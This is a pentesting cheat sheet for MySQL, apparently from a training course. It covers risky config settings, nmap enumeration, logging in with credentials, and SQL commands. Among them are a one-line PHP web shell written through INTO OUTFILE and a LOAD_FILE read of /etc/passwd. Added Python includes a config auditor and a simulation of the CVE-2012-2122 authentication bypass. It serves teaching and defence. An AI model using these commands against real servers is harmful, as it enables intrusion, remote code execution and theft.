# Pentesting MySQL

## Overview

* Default port: TCP 3306
* Config file: `/etc/mysql/mysql.conf.d/mysqld.cnf`

## Installation

```
sudo apt install mysql-server -y
```

## View Config

```
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'
```

## Dangerous Settings

| Setting            | Description                                                                                                                   |
| ------------------ | ----------------------------------------------------------------------------------------------------------------------------- |
| user               | OS account mysqld runs as (`root` means `INTO OUTFILE` writes as root); in `[client]` sections, a plaintext login name          |
| password           | Plaintext password in the option file (typically `[client]` or `[mysqldump]`), readable by anyone who can read the file        |
| admin\_address     | IP the administrative interface listens on (MySQL 8.0.14+); a non-loopback value exposes a second login path                   |
| debug              | Debug tracing; writes server internals to a trace/log file                                                                   |
| sql\_warnings      | When enabled, single-row INSERT statements return an info string with the warning count                                       |
| secure\_file\_priv | Restricts `LOAD DATA`, `SELECT ... INTO OUTFILE` and `LOAD_FILE()`: empty = unrestricted, directory = confined to it, NULL = disabled |
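The following script, added here as an example and not code from the original page, parses an option file the way mysqld reads it (`-` and `_` equivalent in option names, `#` starts a comment anywhere on a line) and flags the settings in the table above. It also checks `bind_address`, which the table does not list but which decides whether port 3306 is reachable from the network at all. The embedded config is constructed for the example and the severity labels are the script's own choice; point `audit_file()` at a real `mysqld.cnf` to audit a host.

```python
"""Audit a my.cnf / mysqld.cnf for risky settings. Added example, not MySQL code."""
from typing import Dict, List, Optional, Tuple

# Constructed sample option file; not taken from any real host.
SAMPLE_CNF = """\
# The MySQL Server configuration file.
[mysqld]
user             = root
pid-file         = /var/run/mysqld/mysqld.pid
port             = 3306
datadir          = /var/lib/mysql
bind-address     = 0.0.0.0
admin_address    = 192.168.1.50
secure-file-priv = ""
debug            = d:t:o,/tmp/mysqld.trace
sql_warnings     = 1
skip-external-locking

[client]
user     = root
password = P4SSw0rd
"""

Finding = Tuple[str, str, str, str]  # (severity, section, option, message)


def parse_cnf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal option-file parser: sections of key=value pairs, '-' and '_' treated as the
    same character in option names (as mysqld does), '#' a comment start anywhere on the
    line, bare flags stored with an empty value, quotes around values stripped."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("!"):        # blank line, or !include / !includedir
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None:                          # option before any [section]; mysqld rejects it
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        sections[current][key] = value
    return sections


def classify_secure_file_priv(value: Optional[str]) -> Tuple[str, str]:
    """Empty = unrestricted, NULL = file operations disabled, anything else = confined to
    that directory. None means the option is absent, so the build's default applies."""
    if value is None:
        return "INFO", "not set; server default applies, confirm with SHOW VARIABLES LIKE 'secure_file_priv'"
    if value.upper() == "NULL":
        return "INFO", "NULL: LOAD_FILE(), INTO OUTFILE and LOAD DATA are disabled"
    if value == "":
        return "HIGH", "empty: file read/write is unrestricted for accounts holding FILE"
    return "MEDIUM", f"restricted to {value}: file operations only inside that directory"


def audit(sections: Dict[str, Dict[str, str]]) -> List[Finding]:
    findings: List[Finding] = []
    srv = sections.get("mysqld", {})
    if srv.get("user") == "root":
        findings.append(("HIGH", "mysqld", "user", "daemon runs as root, so INTO OUTFILE writes as root"))
    bind = srv.get("bind_address")
    if bind is None:
        findings.append(("MEDIUM", "mysqld", "bind_address", "not set; the server default is * (all interfaces)"))
    elif bind in ("0.0.0.0", "*", "::"):
        findings.append(("HIGH", "mysqld", "bind_address", f"{bind}: listens on every interface"))
    admin = srv.get("admin_address")
    if admin is not None and admin not in ("127.0.0.1", "::1", "localhost"):
        findings.append(("MEDIUM", "mysqld", "admin_address", f"admin interface reachable on {admin}"))
    if "debug" in srv:
        findings.append(("MEDIUM", "mysqld", "debug", f"debug tracing enabled ({srv['debug'] or 'default trace'})"))
    if srv.get("sql_warnings", "").lower() in ("1", "on", "true"):
        findings.append(("INFO", "mysqld", "sql_warnings", "single-row INSERTs report warning counts"))
    severity, message = classify_secure_file_priv(srv.get("secure_file_priv"))
    findings.append((severity, "mysqld", "secure_file_priv", message))
    for name, opts in sections.items():              # plaintext credentials in any section
        if "password" in opts:
            findings.append(("HIGH", name, "password", "plaintext password stored in the option file"))
    return findings


def audit_text(text: str) -> List[Finding]:
    return audit(parse_cnf(text))


def audit_file(path: str) -> List[Finding]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_text(fh.read())


if __name__ == "__main__":
    for severity, section, option, message in audit_text(SAMPLE_CNF):
        print(f"[{severity:6}] [{section}] {option}: {message}")
```

Run it against the sample and every row of the table fires; run it against a file with `user = mysql`, `bind-address = 127.0.0.1` and `secure-file-priv = /var/lib/mysql-files` and only the directory restriction is reported, at MEDIUM. When the option is absent altogether the script deliberately does not guess the default, because it differs between upstream and distribution builds; read it from the running server instead.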

## Scanning

```
sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*
```

NSE scripts: mysql-brute, mysql-databases, mysql-dump-hashes, mysql-empty-password, mysql-enum, mysql-info, mysql-users, mysql-variables, mysql-vuln-cve2012-2122

## Connecting

```
mysql -u root -h 10.129.14.132
mysql -u root -pP4SSw0rd -h 10.129.14.128
```

Note: there is no space between `-p` and the password. Passing `-p` on its own prompts for it instead, which keeps the password out of the shell history and out of `ps` output on the attacking host.

## MySQL Commands

| Command                                                | Description     |
| ------------------------------------------------------ | --------------- |
| show databases;                                        | List databases  |
| use \<database>;                                       | Select database |
| show tables;                                           | List tables     |
| show columns from \<table>;                            | List columns    |
| select \* from \<table>;                               | Dump table      |
| select \* from \<table> where \<column> = "\<string>"; | Filter rows     |
| select version();                                      | Server version  |

## Important System Databases

* `sys` (system schema) — views, functions and procedures built on `performance_schema`, meant for administration and tuning
* `information_schema` — metadata on databases, tables, columns and privileges; its `user_privileges` table shows which accounts hold FILE
* `mysql` — the grant tables; `mysql.user` holds account names, hosts and password hashes (what the `mysql-dump-hashes` NSE script pulls)

***

## File Operations

### Write Webshell (requires FILE privilege)

```sql
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
```

`INTO OUTFILE` needs the FILE privilege (`SHOW GRANTS;` lists it), refuses to overwrite an existing file, and writes as the OS user mysqld runs under, so that user needs write access to the web root; on Debian/Ubuntu packages an AppArmor profile for mysqld can still block writes outside the data directory even when the privilege is there. Also check `secure_file_priv`: if empty, file operations are unrestricted; if set to a directory, reads and writes are limited to that path; if NULL, file operations are disabled:

```sql
show variables like "secure_file_priv";
```

### Read Local Files

```sql
select LOAD_FILE("/etc/passwd");
```

***

## Windows MySQL Client

```
C:\htb> mysql.exe -u username -pPassword123 -h 10.129.20.13
```

***

## Known Vulnerabilities

| CVE           | Description                                                                                                                                                                                                                                                                                                                                                                        |
| ------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| CVE-2012-2122 | Authentication bypass in MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24 and 5.6.x before 5.6.6 (and the matching MariaDB releases). Not a timing attack: `check_scramble()` stored `memcmp()`'s int result in a one-byte `my_bool`, so on builds whose memcmp returns values outside -128..127 a wrong password is accepted whenever the low byte of the result is zero, roughly 1 attempt in 256. The account must exist and be allowed from the client's host; the attack is simply reconnecting with any password until it succeeds (nmap's `mysql-vuln-cve2012-2122` does this). |
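The mechanism behind that 1-in-256 figure, as an added example and not MySQL's source: a Python model of `check_scramble()` for `mysql_native_password`, with the pre-fix and post-fix comparison side by side. `wide_memcmp()` is a constructed memcmp that returns the difference of the first differing 32-bit words, standing in for the optimised libc routine on affected builds (any memcmp is allowed to return such values; only the sign is specified). The password and scramble values are made up for the example.

```python
"""Model of CVE-2012-2122 in check_scramble(). Added example, not MySQL's code."""
import hashlib
import random
from typing import Callable, Optional

SCRAMBLE_LEN = 20


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def client_token(password: bytes, scramble: bytes) -> bytes:
    """Client side of mysql_native_password: SHA1(pw) XOR SHA1(scramble || SHA1(SHA1(pw)))."""
    stage1 = sha1(password)
    return xor(stage1, sha1(scramble + sha1(stage1)))


def reassured_stage2(token: bytes, scramble: bytes, stored_stage2: bytes) -> bytes:
    """Server side: unmask stage1 from the token and re-hash it. The result equals the
    SHA1(SHA1(pw)) kept in mysql.user only when the client knew the password."""
    return sha1(xor(token, sha1(scramble + stored_stage2)))


def wide_memcmp(a: bytes, b: bytes) -> int:
    """Standard-conforming memcmp (sign tells the ordering) modelled as the difference of
    the first differing 32-bit words, so it returns values far outside -128..127."""
    for i in range(0, len(a), 4):
        wa, wb = int.from_bytes(a[i:i + 4], "big"), int.from_bytes(b[i:i + 4], "big")
        if wa != wb:
            return wa - wb
    return 0


def check_scramble_vulnerable(token: bytes, scramble: bytes, stored_stage2: bytes) -> bool:
    """Pre-fix: the int from memcmp is stored in a one-byte my_bool; 0 means 'match'.
    Returns True when the server accepts the login."""
    result = wide_memcmp(reassured_stage2(token, scramble, stored_stage2), stored_stage2)
    return (result & 0xFF) == 0          # truncation to char: the bug


def check_scramble_fixed(token: bytes, scramble: bytes, stored_stage2: bytes) -> bool:
    """Post-fix: normalise memcmp to 0/1 first, so truncation to a byte is harmless."""
    result = wide_memcmp(reassured_stage2(token, scramble, stored_stage2), stored_stage2)
    return ((1 if result else 0) & 0xFF) == 0


def bypass_rate(check: Callable[[bytes, bytes, bytes], bool], trials: int, seed: int = 1) -> float:
    """Fraction of wrong-password logins that `check` accepts over fresh random scrambles."""
    rng = random.Random(seed)
    stored_stage2 = sha1(sha1(b"correct-horse"))            # constructed real password
    accepted = 0
    for _ in range(trials):
        scramble = bytes(rng.getrandbits(8) for _ in range(SCRAMBLE_LEN))
        accepted += check(client_token(b"wrong-password", scramble), scramble, stored_stage2)
    return accepted / trials


def attempts_until_bypass(check: Callable[[bytes, bytes, bytes], bool],
                          max_attempts: int = 5000, seed: int = 2) -> Optional[int]:
    """How the attack is run: reconnect with the same wrong password until the server
    lets you in. Every reconnect gets a fresh scramble, hence a fresh 1/256 roll."""
    rng = random.Random(seed)
    stored_stage2 = sha1(sha1(b"correct-horse"))
    for attempt in range(1, max_attempts + 1):
        scramble = bytes(rng.getrandbits(8) for _ in range(SCRAMBLE_LEN))
        if check(client_token(b"wrong-password", scramble), scramble, stored_stage2):
            return attempt
    return None


if __name__ == "__main__":
    print("vulnerable:", bypass_rate(check_scramble_vulnerable, 50000))
    print("fixed:     ", bypass_rate(check_scramble_fixed, 50000))
    print("attempts until bypass:", attempts_until_bypass(check_scramble_vulnerable))
```

The wrong-password comparison pits a fresh SHA1 output against the stored hash, so the low byte of the word difference is zero with probability 1/256, which is the observed rate. The fixed variant never accepts a wrong password no matter what memcmp returns, and both variants still accept the correct one.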
